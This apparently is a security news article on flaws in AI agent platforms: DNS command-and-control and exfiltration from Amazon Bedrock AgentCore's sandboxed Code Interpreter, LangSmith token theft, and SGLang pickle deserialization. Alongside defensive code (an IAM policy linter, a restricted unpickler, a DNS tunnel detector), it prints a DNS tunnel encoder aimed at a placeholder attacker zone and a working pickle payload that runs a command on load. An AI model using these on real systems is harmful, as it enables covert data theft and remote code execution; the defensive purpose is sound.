In recent weeks, the security of the platforms that execute code on behalf of AI agents has set off alarms again. Security researchers have described a technique that extracts sensitive information by abusing Domain Name System (DNS) queries issued from environments that, on paper, should be isolated. A report published by BeyondTrust details how the sandbox mode of the Amazon Bedrock AgentCore Code Interpreter still allows DNS resolution to the outside world, which opens command-and-control channels and exfiltration paths even when the configuration says "no network access."
The vector is strikingly simple in concept: if a sandboxed environment can issue DNS queries for domains the attacker controls, those queries become a two-way message channel. In practice, the researchers built an interactive channel that sends commands and receives responses through DNS records, obtained an interactive reverse shell, and exfiltrated data stored in AWS services, for example in S3 buckets, provided that the IAM role attached to the code interpreter carries excessive permissions. Beyond extraction, the same mechanism can deliver payloads: the Code Interpreter itself downloads and runs instructions stored in the A records served by a malicious DNS server.
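As an added illustration (this is not code from BeyondTrust's report or from AWS), the following Python sketches the two halves of the channel just described: data leaving the sandbox as subdomain labels inside queries, and commands arriving as A-record answers. The zone example.invalid is a placeholder assumed to be attacker-controlled, and the sample data is constructed; nothing is sent on the network, the functions only build and parse the names and addresses a real tunnel would exchange.

```python
import base64
import ipaddress

# Assumption for illustration: a zone the attacker is taken to control.
ATTACKER_ZONE = "example.invalid"
MAX_LABEL = 63   # RFC 1035: a single label is at most 63 octets
MAX_NAME = 253   # practical maximum length of a full query name


def encode_as_queries(data: bytes, zone: str = ATTACKER_ZONE, chunk: int = 30) -> list[str]:
    """Sandbox side of exfiltration: split the data into numbered slices and pack
    each slice into one base32 label, so every query name carries a piece of it.
    Base32 with padding stripped and lower-cased uses only hostname-legal characters."""
    names = []
    for i in range(0, len(data), chunk):
        piece = base64.b32encode(data[i:i + chunk]).decode().rstrip("=").lower()
        assert len(piece) <= MAX_LABEL, "chunk too large for a single label"
        name = f"{i // chunk}.{piece}.{zone}"
        assert len(name) <= MAX_NAME
        names.append(name)
    return names


def reassemble_from_queries(qnames, zone: str = ATTACKER_ZONE) -> bytes:
    """Attacker side: rebuild the data from the authoritative server's query log.
    Resolvers retry and cache, so slices arrive duplicated and out of order;
    the leading sequence label copes with both."""
    pieces = {}
    for qname in qnames:
        if not qname.endswith("." + zone):
            continue
        seq, piece = qname[: -len(zone) - 1].split(".", 1)
        piece = piece.upper()
        piece += "=" * (-len(piece) % 8)   # restore the base32 padding
        pieces[int(seq)] = base64.b32decode(piece)
    return b"".join(pieces[k] for k in sorted(pieces))


def command_to_a_records(command: bytes) -> list[str]:
    """Attacker side of C2: encode a command as A-record answers, four bytes per
    IPv4 address, NUL-padded up to a multiple of four."""
    padded = command + b"\x00" * (-len(command) % 4)
    return [str(ipaddress.IPv4Address(padded[i:i + 4])) for i in range(0, len(padded), 4)]


def a_records_to_command(records) -> bytes:
    """Sandbox side: concatenate the resolved addresses back into the command.
    Trailing NULs are padding; a real protocol would carry an explicit length."""
    return b"".join(ipaddress.IPv4Address(r).packed for r in records).rstrip(b"\x00")
```

Every name produced stays within label and name limits, which is why the tunnel blends into ordinary resolver traffic; what gives it away is volume, label length and entropy rather than any single malformed query. VPC mode with a DNS firewall in front of the resolver breaks the channel at the zone level.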

The finding is flagged as a serious problem: although at the time of writing it has no CVE identifier, BeyondTrust assigned it a severity rating that warrants attention. Amazon, for its part, after the responsible disclosure in September 2025, has characterized the behavior as intended functionality and recommends migrating critical workloads to VPC mode to obtain genuine network isolation. AWS's blog and documentation describe the nature of the service and its deployment options; see the official introduction to the Code Interpreter in the AWS blog post Amazon Bedrock AgentCore Code Interpreter and the technical guide in the official AWS documentation. For those seeking full isolation, AWS points to operating inside a VPC and using a DNS firewall to block unwanted resolutions; a useful reference for that control is the article on Route 53 Resolver DNS Firewall.
The incident illustrates a recurring pattern: combining dynamic code execution (inherent to AI agents) with poorly calibrated permissions multiplies the damage. If the service that runs code has been assigned an over-permissive role, the value of every malicious DNS query rises, because the attacker can, for example, instruct the interpreter to read resources that role can access and return their contents through subdomain labels. The immediate practical recommendation that many experts repeat is to review and limit the IAM roles attached to these services, applying the principle of least privilege and moving sensitive instances to environments with stricter network rules.
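To make the least-privilege point concrete, here is an added example (not AWS tooling and not from the BeyondTrust report) that lints an IAM policy document for the over-broad grants that make a DNS tunnel worth using. Both policy documents are constructed for illustration, with a placeholder bucket name, account ID and log group; the first is the shape that lets a compromised interpreter read any bucket, the second is the scoped equivalent.

```python
import json

# Constructed policy documents (assumptions for illustration only).
PERMISSIVE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:*", "Resource": "*"},
        {"Effect": "Allow",
         "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
         "Resource": "*"},
    ],
})

SCOPED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::example-agent-inputs/*"},
        {"Effect": "Allow",
         "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
         "Resource": "arn:aws:logs:us-east-1:123456789012:log-group:/example/agent:*"},
    ],
})


def _as_list(value):
    """IAM accepts either a single string or a list for Action, NotAction and Resource."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def find_overbroad_statements(policy_json: str) -> list[str]:
    """Flag Allow statements that grant wildcard actions ('*', 'service:*' or any
    glob such as 's3:Get*'), use NotAction (everything except what is listed), or
    apply to every resource. Deny statements only narrow access and are skipped.
    Some actions genuinely have no resource-level permissions; review those by hand
    rather than silencing the finding."""
    policy = json.loads(policy_json)
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        if "NotAction" in stmt:
            findings.append(f"statement {idx}: NotAction allows every action not listed")
        wild = [a for a in _as_list(stmt.get("Action")) if "*" in a]
        if wild:
            findings.append(f"statement {idx}: wildcard action(s) {wild}")
        if "*" in _as_list(stmt.get("Resource")) or "NotResource" in stmt:
            findings.append(f"statement {idx}: applies to every resource")
    return findings
```

Run this over the role attached to the interpreter before deployment and again on every change; the goal is that an attacker who wins code execution in the sandbox can reach nothing the agent did not strictly need.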
This wave of warnings is not isolated. Alongside the Bedrock research, other platforms and libraries in the AI ecosystem have shown serious vulnerabilities. The LangSmith observability platform suffered a flaw that let an attacker steal tokens and take over user accounts by manipulating a URL parameter; the issue received the identifier CVE-2026-25750 and was fixed in version 0.12.71, as the discoverers describe in their analysis at Miggo Security. The risk was that, with a compromised token, an attacker could browse the AI trace history and recover tool calls containing internal queries, CRM records or fragments of private code.
Another set of worrying vulnerabilities affects SGLang, an open-source framework for serving language and multimodal models. Orca researchers described unsafe deserialization flaws involving pickle that, in specific scenarios, allow unauthenticated remote code execution. The issues are tracked as CVE-2026-3059, CVE-2026-3060 and CVE-2026-3989, and Orca published a technical analysis that deserves a careful read here. CERT/CC also issued a coordinated advisory noting that, when certain modules are enabled and exposed to the network, an attacker can send malicious pickle files to the ZeroMQ broker and trigger deserialization of untrusted data, according to the notice.
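To show the class of bug rather than SGLang's own code (this is an added generic example, not the reported exploit), here is a pickle payload that runs a command the moment it is loaded, beside a restricted unpickler that refuses to resolve anything outside an allowlist. The payload uses echo so the effect is visible without harm; the vulnerable pattern is simply calling pickle.loads on bytes that arrived over the wire.

```python
import collections
import io
import pickle
import subprocess


class MaliciousPayload:
    """An object's __reduce__ tells pickle how to rebuild it: a callable plus its
    arguments. This one asks the loader to run subprocess.check_output(["echo", "pwned"]);
    a real payload would name os.system or similar with attacker-chosen arguments."""

    def __reduce__(self):
        return (subprocess.check_output, (["echo", "pwned"],))


def build_malicious_blob() -> bytes:
    # The resulting bytes never mention MaliciousPayload, only subprocess.check_output.
    return pickle.dumps(MaliciousPayload())


def build_benign_blob() -> bytes:
    """What a legitimate message might look like: a plain container of values (constructed)."""
    return pickle.dumps(collections.OrderedDict(task="generate", max_tokens=16))


def unsafe_load(blob: bytes):
    """Vulnerable pattern: deserialize whatever arrived. pickle.loads imports and
    calls whatever the stream names, so the command runs before any validation."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened loader: only listed (module, name) pairs may be resolved."""
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def restricted_load(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def is_rejected(blob: bytes) -> bool:
    """True when the restricted loader refuses the blob."""
    try:
        restricted_load(blob)
    except pickle.UnpicklingError:
        return True
    return False
```

An allowlist on find_class stops this particular trick, but the durable fix is to not accept pickle from the network at all: use a schema-bound format (JSON, protobuf) for messages, and keep the broker reachable only from the hosts that must talk to it.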

The lessons are clear and apply to organizations of any size: agent and model execution environments are already part of the backbone of many operations and should therefore be treated as critical infrastructure. Moving sensitive workloads into virtual private networks and tightening DNS controls reduces the attack surface, but does not replace the need to audit permissions, review default settings and patch promptly when a fix is published. Likewise, exposing ZeroMQ interfaces or similar to untrusted networks is an invitation to trouble; those doors must be closed with segmentation and rules that limit access to specific hosts and ports.
From an operational standpoint, dedicated monitoring is warranted: alerts for processes that open unusual outbound connections, for file creation in unexpected paths, and for DNS traffic to unusual domains. In the LangSmith case the immediate action was to update to a fixed version; for SGLang, beyond patching, the mitigation is to restrict the reach of the brokers and apply network controls. Amazon, for its part, has expressly recommended that customers with critical workloads leave sandbox mode and move to VPC mode for isolation, and use DNS filtering as AWS describes.
Finally, this episode is a reminder that innovation in AI brings new security challenges: dynamic execution, integration with cloud services and developer flexibility coexist with vectors that attackers can chain together. The answer is not to abandon these tools but to manage them with robust security policies, regular permission reviews, and a patching and audit cycle as agile as the development that feeds these platforms. Staying informed through analyses from industry firms and official advisories, such as those linked in this article, is an essential part of that defense.
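An added example of the DNS-side monitoring recommended above (not a vendor detection rule): it scores resolver log lines per registrable domain on unique-subdomain count, average subdomain length and character entropy, three signals that together separate a tunnel from ordinary lookups. The log lines are constructed, the thresholds are starting points to tune against your own baseline, and treating the last two labels as the registrable domain is a simplification that ignores the public-suffix list.

```python
import math
from collections import defaultdict

# Constructed resolver log lines (not real traffic): "<timestamp> <client> <qname>".
# The example.invalid queries imitate a tunnel: numbered, long, base32-looking labels.
SAMPLE_LOG = """\
2026-03-01T10:00:00Z 10.0.1.7 api.github.com
2026-03-01T10:00:01Z 10.0.1.7 pypi.org
2026-03-01T10:00:01Z 10.0.1.7 files.pythonhosted.org
2026-03-01T10:00:02Z 10.0.1.7 0.nbswy3dpfqqho33snrsc4y3pnvuw4zlj.example.invalid
2026-03-01T10:00:02Z 10.0.1.7 1.mfrggzdfmztwqzjanfzxg5dlon2gs3th.example.invalid
2026-03-01T10:00:03Z 10.0.1.7 2.krugkidrovuwg2zamjzg653oebtg66a.example.invalid
2026-03-01T10:00:03Z 10.0.1.7 3.pfxxk4tfeb3xizjaorzwk3tdmuqgc4th.example.invalid
2026-03-01T10:00:04Z 10.0.1.7 4.ifzgkzlqeb2gk4tfeb3w643fmnzgk5a.example.invalid
2026-03-01T10:00:04Z 10.0.1.7 5.ebtwq33snrzsa4tfmnuwk5dfmfxgk2lt.example.invalid
2026-03-01T10:00:05Z 10.0.1.7 6.ifzgkzlqeb2gk4tfeb3w643fmnzgk5a.example.invalid
2026-03-01T10:00:06Z 10.0.1.9 api.github.com
"""


def shannon_entropy(text: str) -> float:
    """Bits per character: encoded data scores high, natural hostnames score low."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_domain(qname: str) -> str:
    """Assumption: the last two labels form the registrable domain (no public-suffix list)."""
    parts = qname.split(".")
    return ".".join(parts[-2:])


def parse_log(log_text: str):
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, qname = line.split()
        yield ts, client, qname.rstrip(".").lower()


def score_domains(log_text: str, min_unique=5, min_avg_len=20, min_entropy=3.0) -> list[dict]:
    """Return the domains whose subdomain pattern looks like a tunnel, together with
    the per-domain statistics a responder would want to see in the alert."""
    subs = defaultdict(set)
    clients = defaultdict(set)
    for _, client, qname in parse_log(log_text):
        dom = registrable_domain(qname)
        if qname == dom:
            continue   # apex lookups carry no subdomain to score
        subs[dom].add(qname[: -len(dom) - 1])
        clients[dom].add(client)
    flagged = []
    for dom, labels in subs.items():
        if len(labels) < min_unique:
            continue
        avg_len = sum(len(s) for s in labels) / len(labels)
        avg_ent = sum(shannon_entropy(s) for s in labels) / len(labels)
        if avg_len >= min_avg_len and avg_ent >= min_entropy:
            flagged.append({"domain": dom,
                            "unique_subdomains": len(labels),
                            "avg_subdomain_len": round(avg_len, 1),
                            "avg_entropy": round(avg_ent, 2),
                            "clients": sorted(clients[dom])})
    return flagged
```

In a sandboxed interpreter the expected DNS footprint is tiny and stable (package indexes, a handful of APIs), so a strict allowlist is usually possible on top of this scoring; where it is not, the per-client field tells you which workload to isolate first.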